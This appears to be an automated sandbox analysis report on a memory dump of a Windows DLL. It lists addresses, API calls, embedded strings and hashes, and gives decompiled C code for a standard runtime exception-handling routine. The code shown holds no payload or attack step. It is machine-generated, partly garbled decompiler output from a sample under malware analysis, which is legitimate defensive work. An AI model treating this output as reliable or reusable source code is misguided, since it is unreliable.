                          0x6ecdce78
                          0x6ecdce7f
                          0x6ecdce85
                          0x6ecdce87
                          0x6ecdce8d
                          0x6ecdce90
                          0x6ecdce96
                          0x6ecdce96
                          0x6ecdce90
                          0x6ecdce87
                          0x00000000
                          0x6ecdce7f
                          0x6ecdcc20
                          0x6ecdcc27
                          0x6ecdcc2e
                          0x6ecdcc2e
                          0x00000000
                          0x6ecdcc2e
                          0x6ecdcb1c
                          0x6ecdcb1f
                          0x6ecdcb21
                          0x00000000
                          0x00000000
                          0x6ecdcb27
                          0x6ecdcb2a
                          0x6ecdcb2d
                          0x6ecdcdb6
                          0x6ecdcdbb
                          0x00000000
                          0x6ecdcdbb
                          0x6ecdcb33
                          0x6ecdcb39
                          0x6ecdcb3e
                          0x6ecdcb40
                          0x6ecdcb43
                          0x6ecdcb4a
                          0x6ecdcb4f
                          0x6ecdcb52
                          0x6ecdcb54
                          0x6ecdcb57
                          0x6ecdcb59
                          0x6ecdcb5b
                          0x6ecdcb5e
                          0x6ecdcb60
                          0x6ecdcb63
                          0x6ecdcb63
                          0x6ecdcb5e
                          0x6ecdcb68
                          0x6ecdcb68
                          0x6ecdcb6b
                          0x6ecdcb6e
                          0x6ecdcaaf
                          0x6ecdcaaf
                          0x6ecdcab1
                          0x00000000
                          0x6ecdcb74
                          0x6ecdcb74
                          0x6ecdcb78
                          0x6ecdcb7b
                          0x6ecdcb7e
                          0x6ecdcea0
                          0x6ecdcea6
                          0x6ecdcea8
                          0x6ecdcea8
                          0x6ecdceab
                          0x6ecdd062
                          0x6ecdd062
                          0x6ecdd067
                          0x6ecdd068
                          0x6ecdd068
                          0x6ecdcc30
                          0x6ecdcc37
                          0x6ecdcc3e
                          0x6ecdcc45
                          0x6ecdcc4c
                          0x6ecdcc50
                          0x6ecdcc57
                          0x6ecdcc5e
                          0x6ecdcc65
                          0x6ecdcc6d
                          0x6ecdcc70
                          0x6ecdcc76
                          0x6ecdcc79
                          0x6ecdcc7f
                          0x6ecdcc85
                          0x6ecdcc8c
                          0x6ecdcc95
                          0x6ecdcc9c
                          0x6ecdcca2
                          0x6ecdcca9
                          0x6ecdccac
                          0x6ecdccba
                          0x6ecdccc1
                          0x6ecdccc9
                          0x6ecdcccc
                          0x6ecdccce
                          0x6ecdccd1
                          0x6ecdccd4
                          0x6ecdccdb
                          0x6ecdccdd
                          0x6ecdcce3
                          0x6ecdcce5
                          0x6ecdcce5
                          0x6ecdccf1
                          0x6ecdccf1
                          0x6ecdccff
                          0x6ecdccff
                          0x6ecdcd04
                          0x6ecdcd15
                          0x6ecdcd1a
                          0x6ecdcf0b
                          0x6ecdcf1a
                          0x6ecdcf21
                          0x6ecdcf28
                          0x6ecdcf32
                          0x6ecdcf35
                          0x6ecdcf3c
                          0x6ecdcf43
                          0x6ecdcf49
                          0x6ecdcf50
                          0x6ecdcf53
                          0x6ecdcf5a
                          0x6ecdcf5f
                          0x6ecdcf68
                          0x6ecdcf6e
                          0x6ecdcf71
                          0x00000000
                          0x00000000
                          0x6ecdcf78
                          0x6ecdcf80
                          0x6ecdcf83
                          0x6ecdcf85
                          0x00000000
                          0x6ecdcd20
                          0x6ecdcd23
                          0x6ecdcfc0
                          0x6ecdcfc3
                          0x6ecdcfc5
                          0x6ecdcfc7
                          0x6ecdcfca
                          0x6ecdcfcf
                          0x6ecdcfcf
                          0x6ecdcfca
                          0x6ecdcfd7
                          0x6ecdcfdd
                          0x6ecdcfe3
                          0x6ecdcfe5
                          0x6ecdcfe7
                          0x6ecdcfea
                          0x6ecdcfef
                          0x6ecdcfef
                          0x6ecdcfea
                          0x6ecdcff9
                          0x6ecdcfff
                          0x6ecdd003
                          0x6ecdd00a
                          0x6ecdd012
                          0x6ecdd019
                          0x6ecdd020
                          0x6ecdd027
                          0x6ecdd02e
                          0x6ecdd032
                          0x6ecdd039
                          0x6ecdd040
                          0x6ecdd048
                          0x6ecdd04b
                          0x6ecdd04e
                          0x6ecdd053
                          0x6ecdd055
                          0x6ecdd055
                          0x6ecdd057
                          0x6ecdd05b
                          0x6ecdd060
                          0x00000000
                          0x6ecdd060
                          0x6ecdcd2b
                          0x6ecdcd31
                          0x6ecdcd33
                          0x00000000
                          0x00000000
                          0x6ecdcd3c
                          0x6ecdcd3f
                          0x6ecdcd46
                          0x6ecdcd4d
                          0x6ecdcd54
                          0x6ecdcd5b
                          0x6ecdcd62
                          0x6ecdcd70
                          0x00000000
                          0x00000000
                          0x6ecdcd7b
                          0x6ecdcd7e
                          0x6ecdcd86
                          0x6ecdcd88
                          0x6ecdcf88
                          0x6ecdcf8b
                          0x6ecdcf92
                          0x6ecdcf9b
                          0x6ecdcf9d
                          0x6ecdcf9f
                          0x6ecdcf9f
                          0x6ecdcfab
                          0x6ecdcfab
                          0x6ecdcfbb
                          0x00000000
                          0x6ecdcfbb
                          0x6ecdcd1a
                          0x6ecdceb1
                          0x00000000
                          0x6ecdceb1
                          0x6ecdcb84
                          0x00000000
                          0x6ecdcb84
                          0x6ecdcb6e
                          0x6ecdcb16
                          0x6ecdc97f

                          APIs
                            • Part of subcall function 6ECDC8C0: AcquireSRWLockShared.KERNEL32(6ED2ADBC), ref: 6ECDC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDCB0D
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCCFF
                          Strings
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6ECDC90D, 6ECDC988
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECDCDC0
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AcquireLockSharedValue
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
                          • API String ID: 942675266-244047474
                          • Opcode ID: b2823dac8c086ebfb2ea2f34a31d7eee99c0d72536248f2279e22cc006ec18ab
                          • Instruction ID: 65bd3772a166eb15d77a0b3e91268fda04dd49018d1c3467b3bef2295c0e07de
                          • Opcode Fuzzy Hash: b2823dac8c086ebfb2ea2f34a31d7eee99c0d72536248f2279e22cc006ec18ab
                          • Instruction Fuzzy Hash: D00224B0E002199FDB10CFE4C994BDEBBB5FF45308F108569D615AB284E776A94ACF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECED036, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6ECED036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6ECEDF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6ECEF563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6ECECCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6ECECCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6ECEC537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6ECEC46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6ECECFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6ECEF563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6ECECCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6ECECCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6ECECCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6ECEC46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6ECECFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6ECECA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6ECEDA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6ECEDA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6ECEF50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6ECED6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6ed2ad60) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6ECECA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6ECED6C1( &_v64);
											E6ECEC29C( &_v64, 0x6ed27f7c);
											L63:
											 *(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6ECEC65D(_t279, _t319, _t274);
											E6ECED945(_a8, _a16, _t305);
											_t235 = E6ECEDB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6ECED8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                          0x6eced036
                          0x6eced03d
                          0x6eced03f
                          0x6eced048
                          0x6eced04e
                          0x6eced056
                          0x6eced058
                          0x6eced05b
                          0x6eced061
                          0x6eced3da
                          0x6eced3da
                          0x6eced3df
                          0x6eced3e1
                          0x6eced3e3
                          0x6eced3e6
                          0x6eced3e7
                          0x6eced3ea
                          0x6eced3f0
                          0x6eced50f
                          0x6eced3f6
                          0x6eced3f6
                          0x6eced3f7
                          0x6eced3f8
                          0x6eced3ff
                          0x6eced402
                          0x6eced405
                          0x6eced40b
                          0x6eced40d
                          0x6eced412
                          0x6eced415
                          0x6eced417
                          0x6eced41d
                          0x6eced41f
                          0x6eced425
                          0x6eced43a
                          0x6eced43f
                          0x6eced442
                          0x6eced444
                          0x6eced50b
                          0x00000000
                          0x6eced50c
                          0x6eced444
                          0x6eced425
                          0x6eced41d
                          0x6eced415
                          0x6eced44a
                          0x6eced44d
                          0x6eced450
                          0x6eced453
                          0x6eced456
                          0x6eced45c
                          0x6eced46e
                          0x6eced473
                          0x6eced476
                          0x6eced479
                          0x6eced47c
                          0x6eced47f
                          0x6eced482
                          0x6eced485
                          0x00000000
                          0x00000000
                          0x6eced48b
                          0x6eced48b
                          0x6eced48e
                          0x6eced491
                          0x6eced4a0
                          0x6eced4a1
                          0x6eced4a1
                          0x6eced4a3
                          0x6eced4a6
                          0x00000000
                          0x00000000
                          0x6eced4a8
                          0x6eced4ab
                          0x00000000
                          0x00000000
                          0x6eced4b9
                          0x6eced4bb
                          0x6eced4be
                          0x6eced4c0
                          0x6eced4c8
                          0x6eced4c8
                          0x6eced4cb
                          0x6eced4cd
                          0x6eced4cf
                          0x6eced4eb
                          0x6eced4f0
                          0x6eced4f3
                          0x6eced4f3
                          0x00000000
                          0x6eced4cb
                          0x6eced4c2
                          0x6eced4c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced4f6
                          0x6eced4f9
                          0x6eced4fa
                          0x6eced4fd
                          0x6eced500
                          0x6eced503
                          0x6eced506
                          0x6eced506
                          0x00000000
                          0x6eced491
                          0x6eced510
                          0x6eced515
                          0x6eced516
                          0x6eced519
                          0x6eced51c
                          0x6eced51d
                          0x6eced51e
                          0x6eced51f
                          0x6eced522
                          0x6eced524
                          0x6eced59c
                          0x6eced59e
                          0x6eced59e
                          0x6eced526
                          0x6eced526
                          0x6eced529
                          0x6eced52c
                          0x00000000
                          0x6eced52e
                          0x6eced52e
                          0x6eced531
                          0x6eced534
                          0x6eced53b
                          0x6eced53b
                          0x6eced53e
                          0x6eced540
                          0x6eced542
                          0x6eced574
                          0x6eced574
                          0x6eced577
                          0x6eced57e
                          0x6eced57e
                          0x6eced581
                          0x6eced584
                          0x6eced58b
                          0x6eced58b
                          0x6eced58e
                          0x6eced595
                          0x6eced597
                          0x6eced597
                          0x6eced590
                          0x6eced590
                          0x6eced593
                          0x00000000
                          0x00000000
                          0x6eced593
                          0x6eced586
                          0x6eced586
                          0x6eced589
                          0x00000000
                          0x00000000
                          0x6eced589
                          0x6eced579
                          0x6eced579
                          0x6eced57c
                          0x00000000
                          0x00000000
                          0x6eced57c
                          0x6eced598
                          0x6eced544
                          0x6eced544
                          0x6eced544
                          0x6eced547
                          0x6eced547
                          0x6eced549
                          0x6eced54b
                          0x00000000
                          0x00000000
                          0x6eced54d
                          0x6eced54f
                          0x6eced563
                          0x6eced563
                          0x6eced551
                          0x6eced551
                          0x6eced554
                          0x6eced557
                          0x00000000
                          0x6eced559
                          0x6eced559
                          0x6eced55c
                          0x6eced55f
                          0x6eced561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced561
                          0x6eced557
                          0x6eced56c
                          0x6eced56c
                          0x6eced56e
                          0x00000000
                          0x6eced570
                          0x6eced570
                          0x6eced570
                          0x00000000
                          0x6eced56e
                          0x6eced567
                          0x6eced569
                          0x6eced569
                          0x00000000
                          0x6eced569
                          0x6eced536
                          0x6eced536
                          0x6eced539
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced539
                          0x6eced534
                          0x6eced52c
                          0x6eced59f
                          0x6eced5a3
                          0x6eced5a3
                          0x6eced070
                          0x6eced070
                          0x6eced079
                          0x6eced176
                          0x6eced176
                          0x6eced179
                          0x00000000
                          0x6eced0a8
                          0x6eced0a8
                          0x6eced0ad
                          0x00000000
                          0x6eced0b3
                          0x6eced0b3
                          0x6eced0bb
                          0x6eced374
                          0x6eced378
                          0x6eced0c1
                          0x6eced0c6
                          0x6eced0c9
                          0x6eced0ce
                          0x6eced0d5
                          0x6eced0da
                          0x00000000
                          0x6eced112
                          0x6eced11a
                          0x6eced17e
                          0x6eced17e
                          0x6eced181
                          0x6eced184
                          0x6eced186
                          0x6eced189
                          0x6eced18c
                          0x6eced192
                          0x6eced343
                          0x6eced343
                          0x6eced346
                          0x00000000
                          0x6eced348
                          0x6eced348
                          0x6eced34b
                          0x00000000
                          0x6eced351
                          0x6eced351
                          0x6eced354
                          0x6eced357
                          0x6eced358
                          0x6eced359
                          0x6eced35c
                          0x6eced35d
                          0x6eced360
                          0x6eced361
                          0x6eced366
                          0x00000000
                          0x6eced366
                          0x6eced34b
                          0x6eced198
                          0x6eced198
                          0x6eced19c
                          0x00000000
                          0x6eced1a2
                          0x6eced1a2
                          0x6eced1a9
                          0x6eced1c1
                          0x6eced1c1
                          0x6eced1c4
                          0x6eced1c7
                          0x6eced1cd
                          0x6eced1dd
                          0x6eced1e2
                          0x6eced1e5
                          0x6eced1e8
                          0x6eced1eb
                          0x6eced1ee
                          0x6eced1f1
                          0x6eced1f4
                          0x6eced1fa
                          0x6eced1fa
                          0x6eced1fd
                          0x6eced200
                          0x6eced20f
                          0x6eced210
                          0x6eced210
                          0x6eced212
                          0x6eced215
                          0x6eced21b
                          0x6eced21e
                          0x6eced224
                          0x6eced226
                          0x6eced229
                          0x6eced22c
                          0x6eced235
                          0x6eced238
                          0x6eced23a
                          0x6eced23a
                          0x6eced23d
                          0x6eced240
                          0x6eced243
                          0x6eced246
                          0x6eced249
                          0x6eced24e
                          0x6eced24f
                          0x6eced250
                          0x6eced251
                          0x6eced252
                          0x6eced255
                          0x6eced257
                          0x6eced259
                          0x00000000
                          0x6eced25b
                          0x6eced25b
                          0x6eced25b
                          0x6eced25e
                          0x6eced261
                          0x6eced263
                          0x6eced264
                          0x6eced269
                          0x6eced26c
                          0x6eced26e
                          0x00000000
                          0x00000000
                          0x6eced270
                          0x6eced271
                          0x6eced274
                          0x6eced276
                          0x00000000
                          0x6eced278
                          0x6eced278
                          0x6eced27b
                          0x6eced27e
                          0x00000000
                          0x6eced27e
                          0x00000000
                          0x6eced276
                          0x6eced292
                          0x6eced298
                          0x6eced2b5
                          0x6eced2ba
                          0x6eced2ba
                          0x6eced2bd
                          0x6eced2bd
                          0x00000000
                          0x6eced281
                          0x6eced281
                          0x6eced282
                          0x6eced285
                          0x6eced288
                          0x6eced28b
                          0x6eced28b
                          0x00000000
                          0x6eced290
                          0x6eced22c
                          0x6eced21e
                          0x6eced2c0
